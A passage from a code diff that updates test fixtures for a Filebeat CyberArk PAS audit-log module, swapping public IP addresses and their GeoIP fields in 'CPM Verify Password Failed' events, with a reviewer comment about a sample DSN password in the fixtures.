Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=81.2.69.143;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=81.2.69.143;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n\n address=81.2.69.143;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=81.2.69.143;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log-expected.json
index a83355aff46e..82aa190cf563 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log-expected.json
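Review bot: The unchanged context lines of this hunk still carry a connection string with an embedded cleartext credential — the 18:00:07 event's `address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;...\\;Password\\=1234` and its `Address` property `...;Password=1234`, and the 17:05:47 event in the preceding hunk has `PWD=1234` in its `DSN` property — while the sanitization pass only swaps the public IP literals for test addresses. If the goal is a fixture with no sensitive-looking sample data, those values deserve the same treatment (an obvious placeholder, with the expected JSON regenerated rather than hand-edited, since they surface as `cyberarkpas.audit.ca_properties.address` and `cyberarkpas.audit.extra_details.other.address`); if they are kept on purpose to exercise the case where CPM audit events leak a DSN password into the indexed fields, a line saying so next to the fixture would stop a later cleanup from dropping that case. The replacement addresses 81.2.69.143 and 67.43.156.12 are presumably from the GeoIP test range used in other fixtures so enrichment stays deterministic — worth confirming that is why they were chosen.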
@@ -2,41 +2,42 @@ { "@timestamp": "2021-03-15T13:19:58.000Z", "cyberarkpas.audit.action": "CPM Verify Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", - "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", + "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ", "cyberarkpas.audit.ca_properties.cpm_status": "failure", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615814397", "cyberarkpas.audit.ca_properties.last_task": "VerifyTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask", "cyberarkpas.audit.ca_properties.retries_count": "0", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart", "cyberarkpas.audit.desc": "CPM Verify Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-15T13:19:58Z", "cyberarkpas.audit.issuer": "PasswordManager", "cyberarkpas.audit.message": "CPM Verify Password Failed", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 
06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n\n address=81.2.69.143;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask. 
Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 15 06:19:58", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "destination.user.name": "ELASTIC\\bart", "event.action": "cpm verify password failed", "event.category": [ 
@@ -47,13 +48,13 @@
 "event.kind": "event",
 "event.module": "cyberarkpas",
 "event.outcome": "failure",
- "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+ "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
 "event.severity": 7,
 "event.timezone": "-02:00",
 "event.type": [
 "error"
 ],
- "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+ "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
@@ -66,7 +67,7 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "10.0.1.20",
- "34.66.114.180"
+ "81.2.69.143"
 ],
 "related.user": [
 "ELASTIC\\bart",
@@ -85,42 +86,43 @@ { "@timestamp": "2021-03-15T13:25:32.000Z", "cyberarkpas.audit.action": "CPM Verify Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", - "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). ", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", + "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). ", "cyberarkpas.audit.ca_properties.cpm_status": "failure", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615814709", "cyberarkpas.audit.ca_properties.last_task": "VerifyTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask", "cyberarkpas.audit.ca_properties.retries_count": "0", "cyberarkpas.audit.ca_properties.user_dn": "ELASTIC.local", "cyberarkpas.audit.ca_properties.user_name": "bart", "cyberarkpas.audit.desc": "CPM Verify Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.username": "bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-15T13:25:32Z", "cyberarkpas.audit.issuer": "PasswordManager", "cyberarkpas.audit.message": "CPM Verify Password Failed", - "cyberarkpas.audit.raw": "\n\n \n 
yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n\n address=34.66.114.180;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). \n\n address=81.2.69.143;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask. 
Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). \n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 15 06:25:32", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "destination.user.name": "bart", "event.action": "cpm verify password failed", "event.category": [ 
@@ -131,17 +133,17 @@
 "event.kind": "event",
 "event.module": "cyberarkpas",
 "event.outcome": "failure",
- "event.reason": "Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). ",
+ "event.reason": "Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). ",
 "event.severity": 7,
 "event.timezone": "-02:00",
 "event.type": [
 "error"
 ],
- "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+ "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 4191,
+ "log.offset": 4151,
 "log.syslog.priority": "7",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -150,7 +152,7 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "10.0.1.20",
- "34.66.114.180"
+ "81.2.69.143"
 ],
 "related.user": [
 "PasswordManager",
@@ -169,41 +171,42 @@ { "@timestamp": "2021-03-15T13:33:26.000Z", "cyberarkpas.audit.action": "CPM Verify Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", - "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", + "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ", "cyberarkpas.audit.ca_properties.cpm_status": "failure", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615815206", "cyberarkpas.audit.ca_properties.last_task": "VerifyTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask", "cyberarkpas.audit.ca_properties.retries_count": "0", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC.local\\bart", "cyberarkpas.audit.desc": "CPM Verify Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.username": "ELASTIC.local\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-15T13:33:26Z", "cyberarkpas.audit.issuer": "PasswordManager", "cyberarkpas.audit.message": "CPM Verify Password Failed", - "cyberarkpas.audit.raw": 
"\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=81.2.69.143;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 15 06:33:26", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "destination.user.name": "ELASTIC.local\\bart", "event.action": "cpm verify password failed", "event.category": [ 
@@ -214,17 +217,17 @@
 "event.kind": "event",
 "event.module": "cyberarkpas",
 "event.outcome": "failure",
- "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+ "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
 "event.severity": 7,
 "event.timezone": "-02:00",
 "event.type": [
 "error"
 ],
- "file.path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+ "file.path": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 8413,
+ "log.offset": 8333,
 "log.syslog.priority": "7",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -233,7 +236,7 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "10.0.1.20",
- "34.66.114.180"
+ "81.2.69.143"
 ],
 "related.user": [
 "ELASTIC.local\\bart",
@@ -252,42 +255,43 @@ { "@timestamp": "2021-03-15T15:04:11.000Z", "cyberarkpas.audit.action": "CPM Verify Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", - "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", + "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ", "cyberarkpas.audit.ca_properties.cpm_status": "failure", "cyberarkpas.audit.ca_properties.creation_method": "PVWA", "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615820651", "cyberarkpas.audit.ca_properties.last_task": "VerifyTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask", "cyberarkpas.audit.ca_properties.retries_count": "1", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC.local\\bart", "cyberarkpas.audit.desc": "CPM Verify Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.other.retriescount": "1", "cyberarkpas.audit.extra_details.username": "ELASTIC.local\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-15T15:04:11Z", "cyberarkpas.audit.issuer": "PasswordManager", "cyberarkpas.audit.message": 
